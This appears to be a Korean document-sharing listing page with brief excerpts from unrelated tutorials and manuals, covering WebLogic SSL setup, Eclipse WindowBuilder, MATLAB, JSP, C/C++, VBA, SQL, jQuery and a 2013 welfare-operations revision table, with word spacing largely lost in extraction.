More information<312E2032303133B3E2B5B520BBE7C8B8BAB9C1F6B0FC20BFEEBFB5B0FCB7C320BEF7B9ABC3B3B8AE20BEC8B3BB28B0E1C0E7BABB292DC6EDC1FD2E687770>
2013년도 운영관련 업무처리안내 개정사항(신구문 대조표) 분야 P 2012년 안내 2013년 안내 개정사유 Ⅱ. 의 운영 3. 의 연혁 Ⅲ. 사업 8 20 12년: 사회복지사업 개정 201 2년: 사회복지사업법 개정 -오타수정 13 사업의 대상 1) 국민기초생활보장 수급자, 차상위계층 등 저소득 주민 2) 장애인, 노인, 한부모가정 등 취약계층 주민
More informationBEA_WebLogic.hwp
BEA WebLogic Server SSL 설정방법 - Ver 1.0-2008. 6 개정이력 버전개정일개정내용 Ver 1.0 2008 년 6 월 BEA WebLogic Server SSL 설명서최초작성 본문서는정보통신부 한국정보보호진흥원의 보안서버구축가이드 를참고하여작성되었습니다. 본문서내용의무단도용및사용을금합니다. < 목차 > 1. 개인키및 CSR 생성방법
More informationiii. Design Tab 을 Click 하여 WindowBuilder 가자동으로생성한 GUI 프로그래밍환경을확인한다.
Eclipse 개발환경에서 WindowBuilder 를이용한 Java 프로그램개발 이예는 Java 프로그램의기초를이해하고있는사람을대상으로 Embedded Microcomputer 를이용한제어시스템을 PC 에서 Serial 통신으로제어 (Graphical User Interface (GUI) 환경에서 ) 하는프로그램개발예를설명한다. WindowBuilder:
More information이 장에서 사용되는 MATLAB 명령어들은 비교적 복잡하므로 MATLAB 창에서 명령어를 직접 입력하지 않고 확장자가 m 인 text 파일을 작성하여 실행을 한다
이장에서사용되는 MATLAB 명령어들은비교적복잡하므로 MATLAB 창에서명령어를직접입력하지않고확장자가 m 인 text 파일을작성하여실행을한다. 즉, test.m 과같은 text 파일을만들어서 MATLAB 프로그램을작성한후실행을한다. 이와같이하면길고복잡한 MATLAB 프로그램을작성하여실행할수있고, 오류가발생하거나수정이필요한경우손쉽게수정하여실행할수있는장점이있으며,
More informationJSP 의내장객체 response 객체 - response 객체는 JSP 페이지의실행결과를웹프라우저로돌려줄때사용되는객체이다. - 이객체는주로켄텐츠타입이나문자셋등의데이터의부가정보 ( 헤더정보 ) 나쿠키 ( 다음에설명 ) 등을지정할수있다. - 이객체를사용해서출력의방향을다른
JSP 의내장객체 response 객체 - response 객체는 JSP 페이지의실행결과를웹프라우저로돌려줄때사용되는객체이다. - 이객체는주로켄텐츠타입이나문자셋등의데이터의부가정보 ( 헤더정보 ) 나쿠키 ( 다음에설명 ) 등을지정할수있다. - 이객체를사용해서출력의방향을다른 URL로바꿀수있다. 예 ) response.sendredirect("http://www.paran.com");
More informationC++ Programming
C++ Programming 예외처리 Seo, Doo-okok clickseo@gmail.com http://www.clickseo.com 목 차 예외처리 2 예외처리 예외처리 C++ 의예외처리 예외클래스와객체 3 예외처리 예외를처리하지않는프로그램 int main() int a, b; cout > a >> b; cout
More informationMicrosoft PowerPoint - e pptx
Import/Export Data Using VBA Objectives Referencing Excel Cells in VBA Importing Data from Excel to VBA Using VBA to Modify Contents of Cells 새서브프로시저작성하기 프로시저실행하고결과확인하기 VBA 코드이해하기 Referencing Excel Cells
More information예제 1.1 ( 관계연산자 ) >> A=1:9, B=9-A A = B = >> tf = A>4 % 4 보다큰 A 의원소들을찾을경우 tf = >> tf = (A==B) % A
예제 1.1 ( 관계연산자 ) >> A=1:9, B=9-A A = 1 2 3 4 5 6 7 8 9 B = 8 7 6 5 4 3 2 1 0 >> tf = A>4 % 4 보다큰 A 의원소들을찾을경우 tf = 0 0 0 0 1 1 1 1 1 >> tf = (A==B) % A 의원소와 B 의원소가똑같은경우를찾을때 tf = 0 0 0 0 0 0 0 0 0 >> tf
More informationMicrosoft PowerPoint - Perpect C 02.ppt [호환 모드]
02 C 프로그래밍기초 충남대학교이형주 1 C 프로그램구조 콘솔응용프로그램 2 프로그램실행순서 C 프로그램은여러함수의조합으로구성 함수란정해진규칙에의하여일련의작업을수행하는프로그램의단위 실행순서 main 함수는프로그램이실행되면가장먼저시작되는부분 모든함수내부에서는위에서아래로, 좌에서우로, 문장이위치한순서대로실행 3 전처리기 전처리기 (preprocessor) 미리처리하는프로그램으로,
More information쉽게 풀어쓴 C 프로그래밍
CHAPTER 13. HTML5 위치정보와드래그앤드롭 SVG SVG(Scalable Vector Graphics) 는 XML- 기반의벡터이미지포맷 웹에서벡터 - 기반의그래픽을정의하는데사용 1999 년부터 W3C 에의하여표준 SVG 의장점 SVG 그래픽은확대되거나크기가변경되어도품질이손상되지않는다. SVG 파일에서모든요소와속성은애니메이션이가능하다. SVG 이미지는어떤텍스트에디터로도생성하고편집할수있다.
More information5장 SQL 언어 Part II
5 장 SQL 언어 Part II 박창이 서울시립대학교통계학과 박창이 ( 서울시립대학교통계학과 ) 5 장 SQL 언어 Part II 1 / 26 데이터조작문 데이터검색 : SELECT 문데이터추가 : INSERT 문데이터수정 : UPDATE 문데이터삭제 : DELETE 문 박창이 ( 서울시립대학교통계학과 ) 5 장 SQL 언어 Part II 2 / 26 SELECT
More informationPowerPoint 프레젠테이션
Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi
More informationTablespace On-Offline 테이블스페이스 온라인/오프라인
2018/11/10 12:06 1/2 Tablespace On-Offline 테이블스페이스온라인 / 오프라인 목차 Tablespace On-Offline 테이블스페이스온라인 / 오프라인... 1 일반테이블스페이스 (TABLESPACE)... 1 일반테이블스페이스생성하기... 1 테이블스페이스조회하기... 1 테이블스페이스에데이터파일 (DATA FILE) 추가
More informationMicrosoft PowerPoint - chap06-2pointer.ppt
2010-1 학기프로그래밍입문 (1) chapter 06-2 참고자료 포인터 박종혁 Tel: 970-6702 Email: jhpark1@snut.ac.kr 한빛미디어 출처 : 뇌를자극하는 C프로그래밍, 한빛미디어 -1- 포인터의정의와사용 변수를선언하는것은메모리에기억공간을할당하는것이며할당된이후에는변수명으로그기억공간을사용한다. 할당된기억공간을사용하는방법에는변수명외에메모리의실제주소값을사용하는것이다.
More informationSBR-100S User Manual
( 1 / 13 ) SBR-100S 모델에 대한 사용자 펌웨어 업그레이드 방법을 안내해 드립니다. SBR-100S 는 신규 펌웨어가 있을시 FOTA(자동업데이트) 기능을 통하여 자동 업그레이드가 되며, 필요시 사용자가 신규 펌웨어를 다운받아 수동으로 업그레이드 할 수 있습니다. 1. 준비하기 1.1 연결 장치 준비 펌웨어 업그레이드를 위해서는 SBR-100S
More information제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호
제이쿼리 () 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호 CSS와마찬가지로, 문서에존재하는여러엘리먼트를접근할수있다. 엘리먼트접근방법 $( 엘리먼트 ) : 일반적인접근방법
More informationPowerPoint 프레젠테이션
Spider For MySQL 실전사용기 피망플러스유닛최윤묵 Spider For MySQL Data Sharding By Spider Storage Engine http://spiderformysql.com/ 성능 8 만 / 분 X 4 대 32 만 / 분 많은 DB 중에왜 spider 를? Source: 클라우드컴퓨팅구 선택의기로 Consistency RDBMS
More informationMicrosoft PowerPoint - chap02-C프로그램시작하기.pptx
#include int main(void) { int num; printf( Please enter an integer "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 을 작성하면서 C 프로그램의
More informationMicrosoft PowerPoint - CSharp-10-예외처리
10 장. 예외처리 예외처리개념 예외처리구문 사용자정의예외클래스와예외전파 순천향대학교컴퓨터학부이상정 1 예외처리개념 순천향대학교컴퓨터학부이상정 2 예외처리 오류 컴파일타임오류 (Compile-Time Error) 구문오류이기때문에컴파일러의구문오류메시지에의해쉽게교정 런타임오류 (Run-Time Error) 디버깅의절차를거치지않으면잡기어려운심각한오류 시스템에심각한문제를줄수도있다.
More informationMicrosoft PowerPoint - logo_3.ppt [호환 모드]
Logo Programming 학습목표 데이터종류를의미하는데이터타입에대해살펴본다. (LOGO의데이터타입 : 단어, 리스트, 배열 ) 값을저장하는공간인변수에대해살펴본다. 데이터관리하기에대해살펴본다. 2012. 5. 박남제 namjepark@jejunu.ac.kr < 데이터타입 > - 단어 단어단어 (word) 는 1 개이상의문자들을나열한것, 123 같은수도단어
More information